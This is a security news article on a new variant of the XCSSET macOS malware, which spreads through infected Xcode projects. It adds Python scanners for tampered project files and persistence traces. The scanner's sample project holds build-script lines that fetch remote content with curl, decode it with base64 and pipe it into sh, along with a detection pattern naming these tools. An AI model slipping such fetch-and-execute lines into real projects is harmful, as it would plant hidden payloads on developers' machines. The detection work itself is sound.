The XCSSET info-stealing malware is back, targeting macOS users and devs

A new, improved variant of the XCSSET macOS malware has been spotted “in limited attacks” by Microsoft’s threat researchers.

XCSSET macOS malware

XCSSET is information-stealing and backdoor-injecting malware targeting Mac users.

It’s usually distributed via infected Xcode projects – a collection of files, settings, and configurations that make up an app or framework developed using Xcode, Apple’s official integrated development environment (IDE) for macOS.

The threat has been around for years, and past variants even used zero-day vulnerabilities to perform some of their malicious actions.

It’s known to be capable of taking screenshots, stealing browser cookies and other data, and grabbing data from apps such as Telegram, WeChat, Evernote, and others.

The variant now spotted by Microsoft can apparently also collect data from the Notes app, exfiltrate system information and files, and target digital wallets. Enhanced obfuscation makes analysis of the malware harder.

New infection, persistence techniques

XCSSET is malware that’s seemingly aimed at a specific subset of macOS users: software developers.

“The method of distribution used can only be described as clever,” Trend Micro researchers said when they first discovered XCSSET.

“Affected developers will unwittingly distribute the malicious trojan to their users in the form of the compromised Xcode projects, and methods to verify the distributed file (such as checking hashes) would not help as the developers would be unaware that they are distributing malicious files.”

The new variant sports new infection techniques, Microsoft researchers discovered.

“[It] introduces new methods for where the payload is placed in a target Xcode project. The method is chosen from one of the following options: TARGET, RULE, or FORCED_STRATEGY. An additional method involves placing the payload inside the TARGET_DEVICE_FAMILY key under build settings and running it at a later phase.”
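One way a developer or reviewer can check a project for the kind of payload placement described above is to scan the `project.pbxproj` file for Run Script build phases that invoke downloaders or decoders, and for build settings such as TARGET_DEVICE_FAMILY whose value carries shell syntax instead of the short device-family literal Xcode itself writes. The scanner below is an added example, not code from Microsoft, Trend Micro, or the XCSSET report; the sample project text is constructed, and the indicator list (curl, base64 decoding, pipes into a shell, and so on) is this example's own choice rather than anything the report states the malware uses.

```python
"""Scan an Xcode project.pbxproj for payload-placement indicators:
a Run Script build phase, or a build setting such as TARGET_DEVICE_FAMILY,
whose value contains shell commands.  Added example (not Microsoft's or
Trend Micro's code); SAMPLE_PBXPROJ is constructed, and the indicator
regex is this example's own choice."""
import re
import sys
from typing import List, Tuple

# `KEY = value;` lines inside a buildSettings block (keys are upper-case)
SETTING_RE = re.compile(r'^\s*([A-Z_][A-Z0-9_]*)\s*=\s*(.+?);\s*$', re.MULTILINE)
# `shellScript = "...";` of a PBXShellScriptBuildPhase (pbxproj escapes " and \n)
SHELL_SCRIPT_RE = re.compile(r'shellScript\s*=\s*"((?:[^"\\]|\\.)*)"\s*;')
# Shell constructs that have no business in a build-setting value.  This
# deliberately does not match $(inherited) / $(SRCROOT) references, which are normal.
SHELL_SYNTAX = re.compile(
    r'`|\|\s*(?:sh|bash|zsh)\b|\bcurl\b|\bwget\b|base64\s+(?:-d|-D|--decode)'
    r'|\beval\b|\bosascript\b|\bxxd\b|\bpython3?\s+-c')
# Legitimate TARGET_DEVICE_FAMILY values are device-family numbers, e.g. "1,2"
DEVICE_FAMILY_OK = re.compile(r'^[1-7](?:,[1-7])*$')

Finding = Tuple[str, str, str]   # (kind, where, offending value)


def unquote(raw: str) -> str:
    """Strip pbxproj double quotes and undo its backslash escapes."""
    raw = raw.strip()
    if len(raw) >= 2 and raw[0] == raw[-1] == '"':
        raw = re.sub(r'\\(.)', lambda m: {'n': '\n', 't': '\t'}.get(m.group(1), m.group(1)),
                     raw[1:-1])
    return raw


def scan_pbxproj(text: str) -> List[Finding]:
    """Return every shell phase or build setting that looks like a smuggled payload."""
    findings: List[Finding] = []
    for m in SHELL_SCRIPT_RE.finditer(text):
        script = unquote('"' + m.group(1) + '"')
        if SHELL_SYNTAX.search(script):
            findings.append(("shell-phase", "shellScript", script.strip()))
    for m in SETTING_RE.finditer(text):
        key, value = m.group(1), unquote(m.group(2))
        if key == "TARGET_DEVICE_FAMILY":
            # Anything other than a device-family list is suspicious here
            if not DEVICE_FAMILY_OK.match(value):
                findings.append(("build-setting", key, value))
        elif SHELL_SYNTAX.search(value):
            findings.append(("build-setting", key, value))
    return findings


# Constructed sample: one tampered Run Script phase and one tampered Release
# configuration next to a clean Debug configuration.  192.0.2.10 is a
# documentation address; aGVsbG8= is just "hello".
SAMPLE_PBXPROJ = r"""// !$*UTF8*$!
{
    objects = {
        AA01 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            name = "Run Script";
            shellScript = "echo \"$(curl -s http://192.0.2.10/p | base64 -d)\" | sh\n";
        };
        AA02 /* Debug */ = {
            isa = XCBuildConfiguration;
            buildSettings = {
                PRODUCT_NAME = "$(TARGET_NAME)";
                TARGET_DEVICE_FAMILY = "1,2";
            };
        };
        AA03 /* Release */ = {
            isa = XCBuildConfiguration;
            buildSettings = {
                FRAMEWORK_SEARCH_PATHS = (
                    "$(inherited)",
                );
                TARGET_DEVICE_FAMILY = "$(echo aGVsbG8= | base64 -d | sh)";
            };
        };
    };
}
"""

if __name__ == "__main__":
    # Usage: python scan_pbxproj.py MyApp.xcodeproj/project.pbxproj
    text = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_PBXPROJ
    for kind, where, value in scan_pbxproj(text):
        print(f"[{kind}] {where}: {value!r}")
```

Run it over a freshly cloned project before opening it in Xcode; a hit is a reason to diff the `.pbxproj` against the upstream repository rather than a verdict on its own, since legitimate projects also ship Run Script phases (linters, code generators, dependency managers).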

The malware also uses new persistence mechanisms:

  • It creates a file named ~/.zshrc_aliases, which contains the payload, and appends a command to it that will launch it every time a new shell session is initiated
  • It downloads a signed dockutil tool from a command-and-control server to manage the dock items, creates a fake Launchpad application, and replaces the legitimate Launchpad’s path entry in the dock with the fake one. The result? Every time the Launchpad is started from the dock, both the legitimate Launchpad and the malicious payload are executed.
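The two persistence mechanisms listed above leave inspectable traces on the host: a shell startup file that references `~/.zshrc_aliases`, and a Dock tile presented as Launchpad whose path no longer points at the system application. The checks below are an added example written from the defender's side, not Microsoft's code. They assume the Dock preference layout (`persistent-apps` / `tile-data` / `file-data` / `_CFURLString`, with `file-label` and `bundle-identifier` on the tile) and the legitimate Launchpad locations listed in the constants; neither comes from the page. The startup-file text and Dock dictionary used for the offline run are constructed.

```python
"""Host checks for the persistence mechanisms described above.
Added example, not Microsoft's code.  Assumed (not from the page): the
com.apple.dock.plist layout and the legitimate Launchpad app locations."""
import os
import plistlib
from typing import Dict, List

ALIAS_FILE = ".zshrc_aliases"                     # file name reported on the page
STARTUP_FILES = (".zshrc", ".zshenv", ".zprofile", ".bash_profile", ".bashrc")
# Where macOS ships Launchpad (assumption; /Applications on older releases)
LEGIT_LAUNCHPAD = ("file:///System/Applications/Launchpad.app/",
                   "file:///Applications/Launchpad.app/")


def startup_file_findings(name: str, text: str) -> List[str]:
    """Return the lines of a shell startup file that reference ~/.zshrc_aliases."""
    return [f"{name}: {line.strip()}" for line in text.splitlines() if ALIAS_FILE in line]


def dock_launchpad_findings(dock: Dict) -> List[str]:
    """Return Dock tiles that present as Launchpad but point outside the system app."""
    bad = []
    for tile in dock.get("persistent-apps", []):
        data = tile.get("tile-data", {})
        label = data.get("file-label", "")
        bundle = data.get("bundle-identifier", "")
        url = data.get("file-data", {}).get("_CFURLString", "")
        looks_like_launchpad = label == "Launchpad" or bundle == "com.apple.launchpad.launcher"
        if looks_like_launchpad and not url.startswith(LEGIT_LAUNCHPAD):
            bad.append(f"Dock tile '{label}' -> {url}")
    return bad


def check_host(home: str = os.path.expanduser("~")) -> List[str]:
    """Run both checks against the current user's files (macOS)."""
    findings: List[str] = []
    if os.path.exists(os.path.join(home, ALIAS_FILE)):
        findings.append(f"~/{ALIAS_FILE} exists")
    for name in STARTUP_FILES:
        path = os.path.join(home, name)
        if os.path.isfile(path):
            with open(path, encoding="utf-8", errors="replace") as fh:
                findings += startup_file_findings(name, fh.read())
    dock_path = os.path.join(home, "Library", "Preferences", "com.apple.dock.plist")
    if os.path.isfile(dock_path):
        with open(dock_path, "rb") as fh:          # plistlib handles binary plists
            findings += dock_launchpad_findings(plistlib.load(fh))
    return findings


# Constructed samples: a tampered .zshrc and a Dock whose Launchpad tile was
# redirected to a user-writable bundle.
SAMPLE_ZSHRC = """export PATH=$HOME/bin:$PATH
alias ll='ls -la'
[ -f ~/.zshrc_aliases ] && . ~/.zshrc_aliases
"""
SAMPLE_DOCK = {"persistent-apps": [
    {"tile-data": {"file-label": "Safari", "bundle-identifier": "com.apple.Safari",
                   "file-data": {"_CFURLString": "file:///Applications/Safari.app/",
                                 "_CFURLStringType": 15}}},
    {"tile-data": {"file-label": "Launchpad", "bundle-identifier": "com.apple.launchpad.launcher",
                   "file-data": {"_CFURLString": "file:///Users/dev/Library/Caches/Launchpad.app/",
                                 "_CFURLStringType": 15}}},
]}

if __name__ == "__main__":
    for hit in startup_file_findings(".zshrc", SAMPLE_ZSHRC) + dock_launchpad_findings(SAMPLE_DOCK):
        print("sample:", hit)
    for hit in check_host():
        print("host:", hit)
```

`check_host()` reads the Dock plist directly from disk, which can lag behind what cfprefsd holds in memory; if you need the live state, export the domain first and run `dock_launchpad_findings` over the exported plist. A hit on either check is worth following up with the app bundle's code signature and the contents of the referenced file.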

Developers should be careful when downloading or cloning Xcode projects from online repositories, websites and developer communities. Even projects provided by someone you trust should be checked, because the provider might not know their project has been “infected”.
